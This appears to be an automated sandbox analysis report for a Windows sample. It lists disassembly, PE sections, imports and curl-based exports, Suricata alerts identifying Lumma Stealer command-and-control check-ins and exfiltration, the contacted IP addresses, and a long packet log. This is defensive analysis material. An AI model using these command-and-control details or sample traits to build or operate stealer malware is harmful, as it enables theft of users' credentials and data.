                                                                                                                                                push ecx
                                                                                                                                                and dword ptr [ebp-04h], 00000000h
                                                                                                                                                push esi
                                                                                                                                                lea eax, dword ptr [ebp-04h]
                                                                                                                                                push eax
                                                                                                                                                push dword ptr [ebp+0Ch]
                                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                                call 00007FCA28B94315h
                                                                                                                                                mov esi, eax
                                                                                                                                                add esp, 0Ch
                                                                                                                                                test esi, esi
                                                                                                                                                jne 00007FCA28B8857Ah
                                                                                                                                                cmp dword ptr [ebp-04h], eax
                                                                                                                                                je 00007FCA28B88575h
                                                                                                                                                call 00007FCA28B88CE0h
                                                                                                                                                test eax, eax
                                                                                                                                                je 00007FCA28B8856Ch
                                                                                                                                                call 00007FCA28B88CD7h
                                                                                                                                                mov ecx, dword ptr [ebp-04h]
                                                                                                                                                mov dword ptr [eax], ecx
                                                                                                                                                mov eax, esi
                                                                                                                                                pop esi
                                                                                                                                                leave
                                                                                                                                                ret
                                                                                                                                                push 00000010h
                                                                                                                                                push 005350A8h
                                                                                                                                                call 00007FCA28B8FBA2h
                                                                                                                                                mov ebx, dword ptr [ebp+08h]
                                                                                                                                                test ebx, ebx
                                                                                                                                                jne 00007FCA28B88570h
                                                                                                                                                push dword ptr [ebp+0Ch]
                                                                                                                                                call 00007FCA28B887B4h
                                                                                                                                                pop ecx
                                                                                                                                                jmp 00007FCA28B88731h
                                                                                                                                                mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                test esi, esi
                                                                                                                                                jne 00007FCA28B8856Eh
                                                                                                                                                push ebx
                                                                                                                                                call 00007FCA28B882C4h
                                                                                                                                                pop ecx
                                                                                                                                                jmp 00007FCA28B8871Ch
                                                                                                                                                cmp dword ptr [00544F44h], 03h
                                                                                                                                                jne 00007FCA28B886F9h
                                                                                                                                                xor edi, edi
                                                                                                                                                mov dword ptr [ebp-1Ch], edi
                                                                                                                                                cmp esi, FFFFFFE0h
                                                                                                                                                ja 00007FCA28B886F0h
                                                                                                                                                push 00000004h
                                                                                                                                                call 00007FCA28B93111h
                                                                                                                                                pop ecx
                                                                                                                                                mov dword ptr [ebp-04h], edi
                                                                                                                                                push ebx
                                                                                                                                                call 00007FCA28B9313Ah
                                                                                                                                                pop ecx
                                                                                                                                                mov dword ptr [ebp-20h], eax
                                                                                                                                                cmp eax, edi
                                                                                                                                                je 00007FCA28B88604h
                                                                                                                                                cmp esi, dword ptr [00544F34h]
                                                                                                                                                jnbe 00007FCA28B885ABh
                                                                                                                                                push esi
                                                                                                                                                push ebx
                                                                                                                                                push eax
                                                                                                                                                call 00007FCA28B9361Ch
                                                                                                                                                add esp, 00000000h

                                                                                                                                                Rich Headers

                                                                                                                                                Programming Language:
                                                                                                                                                • [C++] VS2008 SP1 build 30729
                                                                                                                                                • [ASM] VS2008 SP1 build 30729
                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                                • [EXP] VS2008 SP1 build 30729
                                                                                                                                                • [LNK] VS2008 SP1 build 30729

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x136e500x6a2.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1362a00x64.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1470000x1b4.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x4885ed50x21d0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1480000xbf90.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xef2b00x1c.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1345300x40.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xef0000x248.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000xed5070xed600f4c6c87c3321c5bdf5a08e357cc11ed9False0.5379578890205371data6.607370994218835IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rdata0xef0000x484f20x486006f9c7f42ab9cd82190fb05d5d2bb6881False0.43556374136442144SysEx File -6.019471426718993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0x1380000xe0880xa20061975acd4e39ef4cdbd6617378b6676aFalse0.4645061728395062data5.1688262052545095IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .rsrc0x1470000x1b40x200358be7eb293f99952f6352ce11438b64False0.490234375data5.112623549532036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0x1480000x5e0000x5e0005cd12960aca52fa7f87895e7ca56218fFalse0.6562006524268617data7.5389648445350685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_MANIFEST0x1470580x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                WS2_32.dllgethostname, ioctlsocket, getaddrinfo, freeaddrinfo, connect, socket, closesocket, getpeername, getsockopt, htons, bind, ntohs, getsockname, setsockopt, WSAIoctl, send, recv, select, WSAGetLastError, __WSAFDIsSet, WSASetLastError, WSAStartup, WSACleanup, shutdown
                                                                                                                                                KERNEL32.dllGetStringTypeW, GetStringTypeA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, GetTimeZoneInformation, InitializeCriticalSectionAndSpinCount, GetProcessHeap, SetStdHandle, GetCurrentDirectoryA, GetFullPathNameA, FlushFileBuffers, CreateMutexW, WaitForSingleObject, GetLastError, ReleaseMutex, CloseHandle, Sleep, SetEndOfFile, SetFilePointerEx, WriteFile, WideCharToMultiByte, TerminateThread, GetFileAttributesW, CreateFileW, MoveFileW, GetCurrentThreadId, DeleteFileW, GetTickCount, DeleteCriticalSection, InitializeCriticalSection, LeaveCriticalSection, EnterCriticalSection, SetLastError, SleepEx, GetVersionExA, FormatMessageA, ExpandEnvironmentStringsA, GetProcAddress, GetModuleHandleA, GetVersion, GetFileType, GetStdHandle, MultiByteToWideChar, QueryPerformanceCounter, GlobalMemoryStatus, FreeLibrary, LoadLibraryA, FlushConsoleInputBuffer, SystemTimeToFileTime, GetSystemTime, LCMapStringW, LCMapStringA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, VirtualAlloc, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, CompareStringA, GetLocaleInfoW, CompareStringW, SetEnvironmentVariableA, GetCurrentProcessId, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, ReadFile, ExitThread, CreateThread, GetSystemTimeAsFileTime, HeapFree, HeapReAlloc, HeapAlloc, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, GetDriveTypeA, FindFirstFileA, CreateFileA, GetModuleHandleW, ExitProcess, SetConsoleCtrlHandler, ReadConsoleInputA, SetConsoleMode, GetConsoleMode, RtlUnwind, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, InterlockedDecrement, GetConsoleCP, RaiseException, SetHandleCount, GetStartupInfoA, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetModuleFileNameA, HeapCreate, VirtualFree
                                                                                                                                                USER32.dllMessageBoxA, GetProcessWindowStation, GetUserObjectInformationW, PostThreadMessageW
                                                                                                                                                ADVAPI32.dllReportEventA, DeregisterEventSource, RegisterEventSourceA

                                                                                                                                                Exports

                                                                                                                                                NameOrdinalAddress
                                                                                                                                                curl_easy_cleanup60x406100
                                                                                                                                                curl_easy_duphandle70x406180
                                                                                                                                                curl_easy_escape80x420d20
                                                                                                                                                curl_easy_getinfo90x406160
                                                                                                                                                curl_easy_init100x405ee0
                                                                                                                                                curl_easy_pause110x4063f0
                                                                                                                                                curl_easy_perform120x405f50
                                                                                                                                                curl_easy_recv130x4065a0
                                                                                                                                                curl_easy_reset140x406350
                                                                                                                                                curl_easy_send150x406600
                                                                                                                                                curl_easy_setopt160x405f20
                                                                                                                                                curl_easy_strerror170x415a40
                                                                                                                                                curl_easy_unescape180x420ef0
                                                                                                                                                curl_escape190x420f70
                                                                                                                                                curl_formadd200x4252a0
                                                                                                                                                curl_formfree210x425490
                                                                                                                                                curl_formget220x425d30
                                                                                                                                                curl_free230x420f50
                                                                                                                                                curl_getdate240x4244e0
                                                                                                                                                curl_getenv250x420c90
                                                                                                                                                curl_global_cleanup260x405e90
                                                                                                                                                curl_global_init270x405d80
                                                                                                                                                curl_global_init_mem280x405e10
                                                                                                                                                curl_maprintf290x4157b0
                                                                                                                                                curl_mfprintf300x415930
                                                                                                                                                curl_mprintf310x415900
                                                                                                                                                curl_msnprintf320x414dc0
                                                                                                                                                curl_msprintf330x4158d0
                                                                                                                                                curl_multi_add_handle340x40f460
                                                                                                                                                curl_multi_assign350x40f350
                                                                                                                                                curl_multi_cleanup360x40ebf0
                                                                                                                                                curl_multi_fdset370x40ea80
                                                                                                                                                curl_multi_info_read380x40ece0
                                                                                                                                                curl_multi_init390x40e910
                                                                                                                                                curl_multi_perform400x410940
                                                                                                                                                curl_multi_remove_handle410x40fa90
                                                                                                                                                curl_multi_setopt420x40ee50
                                                                                                                                                curl_multi_socket430x410c30
                                                                                                                                                curl_multi_socket_action440x410c60
                                                                                                                                                curl_multi_socket_all450x410ca0
                                                                                                                                                curl_multi_strerror460x415db0
                                                                                                                                                curl_multi_timeout470x40eff0
                                                                                                                                                curl_multi_wait480x40f5f0
                                                                                                                                                curl_mvaprintf490x415840
                                                                                                                                                curl_mvfprintf500x4159b0
                                                                                                                                                curl_mvprintf510x415980
                                                                                                                                                curl_mvsnprintf520x414d60
                                                                                                                                                curl_mvsprintf530x415950
                                                                                                                                                curl_share_cleanup540x41a2b0
                                                                                                                                                curl_share_init550x41a0f0
                                                                                                                                                curl_share_setopt560x41a110
                                                                                                                                                curl_share_strerror570x415e20
                                                                                                                                                curl_slist_append580x411a20
                                                                                                                                                curl_slist_free_all590x411a60
                                                                                                                                                curl_strequal600x423620
                                                                                                                                                curl_strnequal610x423640
                                                                                                                                                curl_unescape620x420f90
                                                                                                                                                eud_cancel40x403f40
                                                                                                                                                eud_download30x403d90
                                                                                                                                                eud_get_progress50x403f60
                                                                                                                                                eud_init10x403d20
                                                                                                                                                eud_uninit20x403d70

                                                                                                                                                Possible Origin

                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                EnglishUnited States

                                                                                                                                                Network Behavior

                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-12-30T18:19:11.591616+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:12.261155+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:12.261155+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:12.741413+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:13.229866+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:13.229866+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:13.996351+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:15.154663+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:16.620362+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:19.923859+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:20.992784+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:22.172959+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449740188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:23.166550+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:25.275090+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:25.778758+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744188.114.97.3443TCP
                                                                                                                                                2024-12-30T18:19:26.632901+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745185.161.251.21443TCP
                                                                                                                                                2024-12-30T18:19:27.076691+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746104.21.37.128443TCP

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 30, 2024 18:19:11.110271931 CET49730443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:11.110306978 CET44349730188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:11.110359907 CET49730443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:11.113281965 CET49730443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:11.113300085 CET44349730188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:11.591440916 CET44349730188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:11.591615915 CET49730443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:11.595227957 CET49730443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:11.595240116 CET44349730188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:11.595473051 CET44349730188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:11.639328003 CET49730443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:11.643256903 CET49730443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:11.643273115 CET49730443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:11.643359900 CET44349730188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:12.261173010 CET44349730188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:12.261276007 CET44349730188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:12.261369944 CET49730443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:12.263154984 CET49730443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:12.263211012 CET44349730188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:12.263247967 CET49730443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:12.263263941 CET44349730188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:12.272494078 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:12.272553921 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:12.272639990 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:12.272912979 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:12.272927999 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:12.741264105 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:12.741413116 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:12.742542028 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:12.742577076 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:12.742793083 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:12.743959904 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:12.743959904 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:12.744030952 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.229857922 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.229914904 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.229937077 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.229995012 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.230022907 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.230020046 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.230062008 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.230081081 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.230114937 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.230120897 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.230350971 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.230390072 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.230396986 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.235320091 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.235354900 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.235368013 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.235377073 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.235419035 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.235424995 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.280030012 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.318020105 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.318098068 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.318118095 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.318149090 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.318166018 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.318203926 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.348859072 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.348952055 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.348994970 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.349117041 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.349138021 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.349154949 CET49731443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.349162102 CET44349731188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.499839067 CET49732443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.499898911 CET44349732188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.499993086 CET49732443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.500261068 CET49732443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.500274897 CET44349732188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.996268034 CET44349732188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.996351004 CET49732443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.997863054 CET49732443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.997874975 CET44349732188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.998080969 CET44349732188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:13.999663115 CET49732443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:13.999983072 CET49732443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:14.000022888 CET44349732188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:14.000070095 CET49732443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:14.000077963 CET44349732188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:14.615256071 CET44349732188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:14.615405083 CET44349732188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:14.615454912 CET49732443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:14.615554094 CET49732443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:14.615575075 CET44349732188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:14.694065094 CET49733443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:14.694113016 CET44349733188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:14.694174051 CET49733443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:14.694438934 CET49733443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:14.694451094 CET44349733188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:15.154437065 CET44349733188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:15.154663086 CET49733443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:15.156105042 CET49733443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:15.156119108 CET44349733188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:15.156323910 CET44349733188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:15.157610893 CET49733443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:15.157746077 CET49733443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:15.157771111 CET44349733188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:15.613111973 CET44349733188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:15.613204956 CET44349733188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:15.613351107 CET49733443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:15.613415956 CET49733443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:15.613436937 CET44349733188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:16.132924080 CET49734443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:16.132976055 CET44349734188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:16.133064985 CET49734443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:16.133789062 CET49734443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:16.133800983 CET44349734188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:16.620134115 CET44349734188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:16.620362043 CET49734443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:16.621589899 CET49734443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:16.621598005 CET44349734188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:16.621786118 CET44349734188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:16.624775887 CET49734443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:16.624968052 CET49734443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:16.624989033 CET44349734188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:16.625070095 CET49734443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:16.625081062 CET44349734188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:17.948179960 CET44349734188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:17.948431969 CET44349734188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:17.948493958 CET49734443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:17.948615074 CET49734443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:17.948633909 CET44349734188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:19.440999031 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:19.441057920 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:19.441240072 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:19.441512108 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:19.441523075 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:19.923749924 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:19.923858881 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:19.932136059 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:19.932168961 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:19.932435989 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:19.933582067 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:19.933696985 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:19.933732986 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.393292904 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.393397093 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.397874117 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.398003101 CET49737443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.398029089 CET44349737188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.510051012 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.510097980 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.510176897 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.510477066 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.510488987 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.992714882 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.992784023 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.994051933 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:20.994062901 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:20.994256973 CET44349740188.114.97.3192.168.2.4
                                                                                                                                                Dec 30, 2024 18:19:21.003988981 CET49740443192.168.2.4188.114.97.3
                                                                                                                                                Dec 30, 2024 18:19:21.004086018 CET49740443192.168.2.4188.114.97.3
